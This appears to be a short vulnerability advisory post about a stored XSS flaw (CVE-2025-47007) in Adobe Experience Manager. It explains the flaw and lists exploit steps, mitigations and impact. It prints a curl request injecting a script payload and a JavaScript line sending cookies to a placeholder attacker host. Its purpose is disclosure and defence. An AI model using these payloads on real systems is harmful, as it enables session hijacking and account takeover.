Listen to this Post
How CVE-2025-47007 Works
Adobe Experience Manager (AEM) versions 6.5.22 and earlier contain a stored XSS vulnerability in form fields. Attackers with low privileges can inject malicious JavaScript payloads into these fields. When authenticated users access pages containing the compromised fields, the scripts execute in their browser context. This occurs due to insufficient input sanitization in the affected components, allowing arbitrary script injection through crafted HTTP requests. The vulnerability persists because AEM fails to properly encode user-supplied data before rendering it in web views.
DailyCVE Form
Platform: Adobe Experience Manager
Version: ≤6.5.22
Vulnerability: Stored XSS
Severity: Critical
Date: 06/16/2025
Prediction: Patch by 07/15/2025
What Undercode Say
curl -X POST 'http://target/aem/form' -d 'field=<script>alert(1)</script>'
document.location='http://attacker/steal?cookie='+document.cookie
How Exploit
1. Authenticate with low-privilege account
2. Submit malicious script via vulnerable form
3. Wait for admin to view compromised page
4. Session hijacking via cookie theft
Protection from this CVE
1. Upgrade to AEM 6.5.23+
2. Implement CSP headers
3. Sanitize form inputs
Impact
1. Session hijacking
2. Account takeover
3. Privilege escalation
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
